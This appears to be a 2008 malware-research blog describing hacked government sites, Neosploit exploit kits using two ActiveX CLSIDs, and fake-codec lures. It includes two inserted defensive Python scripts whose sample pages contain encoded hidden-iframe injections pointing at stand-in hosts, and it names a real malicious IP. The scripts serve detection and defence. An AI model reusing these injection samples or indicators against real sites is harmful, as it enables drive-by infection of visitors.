Monday, February 25, 2008

google defames saints ... bolts of lightning fall

I'm kidding, I'm kidding!!!!!!!

Update number 2: Feb 26, 2008, 6:30am est

Dang, that was quick. Some of the sites, such as the St Kilda and Geelong Cats sites, are now correctly marked as clean. They're not all correct yet, though ... the Brisbane Lions site is still incorrectly marked as dangerous, for example, but that was still quick for the others, and we hope that all will shortly be corrected. Shout-outs to google for reacting quickly!

Update number 1:

Some of our team in the Australian office noticed that it wasn't just the Saints: the Victorian-based clubs of North Melbourne Kangaroos, Carlton Blues, Geelong Cats, Hawthorn Hawks, Melbourne Demons and Richmond Tigers, plus Port Adelaide Power (South Australia), Sydney Swans (New South Wales) and Brisbane Lions (Queensland), were all being blocked by Google the same way. Shout-outs to the guys down-unda!

-----------------------------------------------------------------

Hi folks,

What I'm really talking about is that if you search for "saints football club", the number 3 organic search result is the famous (to Australians) St Kilda Football club. The "defamation" bit is that google has one of its "This site may harm your computer" messages against it.



(If you look at the screen snapshot, you'll notice that LinkScanner assesses the site to be clean... the correct result)

This means that it is not possible for anyone to click through from a google search and get to the St Kilda website... you have to deliberately copy and paste the URL into your browser's address bar.

The reason they're doing it is, probably, that at some point the website was hacked and was infecting visitors, but ....GOOGLE-GUYS!!! IT'S CLEAN NOW!!! TAKE THE BLOCK OFF, PLEASE!!! (I feel like saying "Mr Google! Tear down this wall!", but I wouldn't be so bold.)

What this really underscores is that a centralized database is useless at detecting web issues... the problem is simply too transient, and the database lags both the infection and the cleanup.

This happens quite a bit, and I must admit that I'm surprised that no one has accused google of damaging their brand. I'm sure regular readers of my blog will remember the case of k1-usa.net. They used to be the number one organic result when people searched for k1. They were hacked for about 10 days, and then cleaned, but in the meantime they had earned the "This site may harm your computer" label, and over the next 12 months, before the label was removed, their ranking slipped, and slipped, until finally it was nowhere on the first three pages.

I can't imagine St Kilda taking it lying down if their ranking starts to slip, and I can't imagine google meaning that to happen. It just shows how difficult it is to keep up.

Cheers


Roger


Friday, February 22, 2008

Another gov site hacked

Hi folks,

Who can see what's wrong with this picture?



Looks pretty reasonable, doesn't it? Here's what you see if you have a suitable monitoring tool...



Enquiring minds will wonder why a county government site is reaching out to pepato.org.

And here's what you see on a vulnerable PC, _if_ you're running another suitable monitoring tool...



And here's the offending code in the page source ...



Yes, it's hacked. Bit hard to tell without some tools, though, eh? We've told the county, so we expect it'll get cleaned up very quickly, but be careful in the meantime.

Cheers

Roger


Thursday, February 21, 2008

This is kind of funny

Hi folks,

We've been following up on the new Neosploit that we reported last night. This was actually a pretty high-profile site, so we wanted to notify them. We couldn't find a contact point on the hacked domain, but we found another subdomain that had an online support chat option, and we gave it a try. The conversation was sufficiently funny that we grabbed a screen capture (anonymized to protect the innocent). You might have to double-click it to read it, but it's worthwhile...




:-)

Fwiw, we eventually found someone who understood, and we got it cleaned up.

Cheers

Roger


Wednesday, February 20, 2008

New Neo Now

(Sorry... the alliteration bug bit me)

Hi folks,

Last night, as the title suggests, we found a new version of Neosploit. It has two new exploits: one uses a CLSID of EEE78591-FE22-11D0-8BEF-0060081841DE, which appears to be the ActiveVoice ActiveX DLL from Microsoft, and the other uses CLSID 5F810AFC-BB5F-4416-BE63-E01DD117BD6C, which is the Music Jukebox control from Yahoo.

The most recent public ActiveVoice exploit seems to be from about June 2007, but the most recent Jukebox exploit is from February 2008, so that's kind of interesting.

We'll try to figure out over the next couple of days whether these are indeed the ones that match up, but the bottom line is that the Neosploit developers are very active.
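A practitioner reading this wants two things: a way to spot pages that instantiate these two controls, and, for machines that can't be patched right away, the kill bit that stops Internet Explorer from loading them at all. Below is an added example, not code from this blog and not LinkScanner's. The two CLSIDs are the ones quoted in the post; the control names beside them are the post's identification, not independently confirmed here. The sample page and the third, benign CLSID in it are constructed for the example.

```python
import re

# The two CLSIDs from the post, with the controls the post attributes them to.
WATCHED_CLSIDS = {
    "EEE78591-FE22-11D0-8BEF-0060081841DE": "Microsoft ActiveVoice (per the post)",
    "5F810AFC-BB5F-4416-BE63-E01DD117BD6C": "Yahoo! Music Jukebox control (per the post)",
}

# Matches a GUID with or without braces, any case, wherever it appears: in
# <object classid="clsid:...">, in script that builds the tag, or in a kit's config.
CLSID_RE = re.compile(r"\{?([0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12})\}?")

# Constructed sample exploit page (assumption: not Neosploit's real output).
# The first control is written as an <object> tag, the second is only referenced
# from script (kits build the tag at runtime), the third is a benign placeholder.
SAMPLE_EXPLOIT_PAGE = """
<html><body>
<object classid="clsid:{eee78591-fe22-11d0-8bef-0060081841de}" id="v"></object>
<script>
  var t = '<object classid="clsid:5f810afc-bb5f-4416-be63-e01dd117bd6c" id="j"></object>';
  document.write(t);
</script>
<object classid="clsid:12345678-1234-1234-1234-123456789ABC" id="ok"></object>
</body></html>
"""


def normalize_clsid(clsid: str) -> str:
    """Strip braces and upper-case so every spelling of a CLSID compares equal."""
    return clsid.strip("{}").upper()


def find_watched_clsids(html: str):
    """Return the watched CLSIDs present in html, in order of first appearance,
    each with a short snippet of the surrounding markup."""
    hits, seen = [], set()
    for m in CLSID_RE.finditer(html):
        clsid = normalize_clsid(m.group(1))
        if clsid in WATCHED_CLSIDS and clsid not in seen:
            seen.add(clsid)
            start = max(0, m.start() - 30)
            hits.append({
                "clsid": clsid,
                "control": WATCHED_CLSIDS[clsid],
                "context": html[start:m.end() + 1].strip(),
            })
    return hits


def killbit_reg(clsids) -> str:
    """Build a .reg file that sets the IE kill bit (Compatibility Flags = 0x400)
    for each CLSID, so IE refuses to instantiate the control even while it stays installed."""
    lines = ["Windows Registry Editor Version 5.00", ""]
    for clsid in clsids:
        lines.append(r"[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer"
                     r"\ActiveX Compatibility\{%s}]" % normalize_clsid(clsid))
        lines.append('"Compatibility Flags"=dword:00000400')
        lines.append("")
    return "\n".join(lines)


if __name__ == "__main__":
    hits = find_watched_clsids(SAMPLE_EXPLOIT_PAGE)
    for h in hits:
        print(f"{h['clsid']}  {h['control']}\n    ...{h['context']}")
    print(killbit_reg(h["clsid"] for h in hits))
```

The scan is deliberately dumb: it looks for the GUID anywhere in the page rather than only inside an object tag, because kits assemble the tag at runtime. The kill bit is the stop-gap, not the fix; it only stops IE from instantiating the control, so the vulnerable DLL should still be patched or removed.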

Cheers

Roger


Saturday, February 16, 2008

Wow... this was quick

Hi folks,

I'm sure most people know about the horrific attack on the poor NYC psych. In the news tonight, we noticed that the police had arrested someone named David Tarloff for allegedly being the perp. With the web being what it is, we often find that if you look quickly, you can find personal pages about these people, often before the police get them taken down. Ok, it's a little morbid, but it's interesting at the same time.

So, when we googled for David Tarloff, here was the result...



Hmmm... an AOL journal account... that sounds plausible for a personal page... click...



Yep ... still looks plausible ... let's click the name ... click...



WAAAAIT A MINUTE!!!!! That ain't no Hank Williams song! (Pop culture reference to Bob, of Bob's Country Bunker in the Blues Brothers, where Bob suddenly realizes that the boys aren't really a country and western band, and that he's been had.)

Attentive readers will instantly notice that this is a fake codec, and will close the browser. Non-attentive readers will attempt to install the codec, and will be rewarded with a rootkit.

But how quick was that? We only noticed that the guy had been arrested and named today, and yet they not only managed to get their lure in place on AOL, but they also managed to get their site the Number One organic result on Google if you search for David Tarloff! And on the weekend at that! These boys are on the ball. We're grudgingly impressed.

Be careful folks, it's a tricky world out there.

Cheers

Roger


Thursday, February 07, 2008

MalwareAlarm

Hi folks,

MalwareAlarm is so common now that we decided to give it its own video. Remember, it's not really scanning your PC, it's just pretending to, but it does a very good job of pretending. Enjoy...



Cheers

Roger


Wednesday, February 06, 2008

UK .gov site hacked

Note: One of our users, John Thomson (no relation as far as I know :-) ) noticed this first and brought it to our attention. His blog entry is here ...
http://www.roundtripsolutions.com/blog/2008/02/06/317/forth-road-bridge-website-hacked/

Sorry John! :-)

Hi folks,

Sometime between the 1st of February 2008 and the 3rd of February 2008, the official website for the Forth Estuary Transport Authority was hacked, and an obfuscated iframe, using Neosploit encoding, was injected.



This decoded to an iframe that called out to 88.255.90.130 (careful about going there, folks)...



This, in turn, loaded one of the current Neosploit exploit packages (we have a full write-up on Neo a little further down this blog). If you're patched, or running LinkScanner, you're ok, but if not, you probably got a rootkit, so if you visited that website in the last couple of days, you might like to run an anti-rootkit scanner and an anti-virus over your system. AVG has a free one here ... http://free.grisoft.com .

One of the most interesting aspects of this is that inside the full Neosploit download was an attempt to load bbc.com.uk, presumably after the infection, and presumably to hide what had happened a little bit. That's no big deal in itself, but a hacked UK gov website pointing to the BBC afterwards makes us think it was not a random hack, but something more deliberate. Interesting times, folks.

Looks like they cleaned the site this morning, although the google cache still serves the injected code, so be careful.
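The county site post above and this Forth Road Bridge post come down to the same check: find the injected iframe or script, decode it if it's obfuscated, and ask whether the host it points at actually belongs to the site. The following is an added example, not code from this blog and not LinkScanner's. Neosploit's own encoding isn't reproduced on the page, so the decoder only handles the generic `unescape("%..")` and `String.fromCharCode(...)` wrappers that injected loaders commonly use; the sample page, the site host www.example.gov, and the addresses 192.0.2.10 and bad.example are constructed for the example, not the real ones.

```python
import ipaddress
import re
from urllib.parse import unquote, urlparse

# Constructed sample page (assumption: not the real county or bridge site).
# The menu script and the news iframe are same-origin and legitimate; the two
# document.write() calls inject hidden, off-site iframes the way the posts describe.
SAMPLE_HTML = r"""
<html><head><title>County Government</title>
<script src="/js/menu.js"></script>
</head><body>
<h1>Welcome</h1>
<script>document.write(unescape("%3Ciframe%20src%3D%22http%3A%2F%2F192.0.2.10%2Fin.php%22%20width%3D1%20height%3D1%20style%3D%22visibility%3Ahidden%22%3E%3C%2Fiframe%3E"))</script>
<script>document.write(String.fromCharCode(60,105,102,114,97,109,101,32,115,114,99,61,34,104,116,116,112,58,47,47,98,97,100,46,101,120,97,109,112,108,101,47,34,62,60,47,105,102,114,97,109,101,62))</script>
<iframe src="http://www.example.gov/news" width="600" height="300"></iframe>
</body></html>
"""

UNESCAPE_RE = re.compile(r"""unescape\(\s*(["'])(.*?)\1\s*\)""", re.S)
FROMCHARCODE_RE = re.compile(r"String\.fromCharCode\(([\d\s,]+)\)")
UNICODE_ESC_RE = re.compile(r"%u([0-9A-Fa-f]{4})")

TAG_RE = re.compile(r"<(iframe|script|object|embed)\b([^>]*)>", re.I)
SRC_RE = re.compile(r"""\bsrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""", re.I)
HIDDEN_RE = re.compile(
    r"""(?:width|height)\s*=\s*["']?[01]\b|display\s*:\s*none|visibility\s*:\s*hidden""", re.I)


def js_unescape(text: str) -> str:
    """JavaScript unescape(): %uXXXX first, then the ordinary %XX escapes."""
    text = UNICODE_ESC_RE.sub(lambda m: chr(int(m.group(1), 16)), text)
    return unquote(text)


def deobfuscate(html: str) -> str:
    """Expand the two cheap wrappers so the hidden markup can be scanned as
    ordinary HTML. Loops to a fixed point so nested wrappers are peeled too."""
    previous = None
    while previous != html:
        previous = html
        html = UNESCAPE_RE.sub(lambda m: js_unescape(m.group(2)), html)
        html = FROMCHARCODE_RE.sub(
            lambda m: "".join(chr(int(c)) for c in m.group(1).split(",") if c.strip()),
            html)
    return html


def _host_belongs(host: str, site_host: str) -> bool:
    return host == site_host or host.endswith("." + site_host)


def audit_page(html: str, site_host: str):
    """Return one finding per iframe/script/object/embed whose source is
    off-site, an IP literal, or a hidden iframe, after de-obfuscation."""
    findings = []
    for m in TAG_RE.finditer(deobfuscate(html)):
        tag, attrs = m.group(1).lower(), m.group(2)
        s = SRC_RE.search(attrs)
        if not s:
            continue
        src = next(g for g in s.groups() if g is not None)
        host = urlparse(src).hostname
        if host is None:           # relative URL: same origin, nothing to flag
            continue
        reasons = []
        if not _host_belongs(host, site_host):
            reasons.append("external host")
        try:
            ipaddress.ip_address(host)
            reasons.append("ip-literal host")
        except ValueError:
            pass
        if tag == "iframe" and HIDDEN_RE.search(attrs):
            reasons.append("hidden iframe")
        if reasons:
            findings.append({"tag": tag, "src": src, "host": host, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_page(SAMPLE_HTML, "www.example.gov"):
        print(f"{f['tag']:<7} {f['src']:<40} {', '.join(f['reasons'])}")
```

Run against a saved copy of the page (including the Google cache copy, which the post notes can stay infectious after the live site is cleaned) and anything that is both a hidden iframe and an IP-literal host deserves a look before anything else. The check is static; it won't see markup that only a full JavaScript engine would produce, which is why the posts lean on a monitoring tool watching the browser's actual outbound requests as well.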

Cheers

Roger


Saturday, February 02, 2008

Return of Innocent Searches

Hi folks,

I keep getting requests offline for more innocent searches, so here are some from the last couple of days. Enjoy...

coal furnace with gas insert - fake codec
road trip - neosploit
pearl shop - neosploit
high capacity battery pack - fake codec/ rootkit
eyelashes + adhesive - fake codec
camping turon gate - fake codec
greenville gremlins - fake codec
blueberry jam - mpack/ icepack
school closings in illinois parents - search engine hijack
las vegas wedding photographers - mdac
carolina theater - mpack/ icepack

Stay safe folks,

Roger
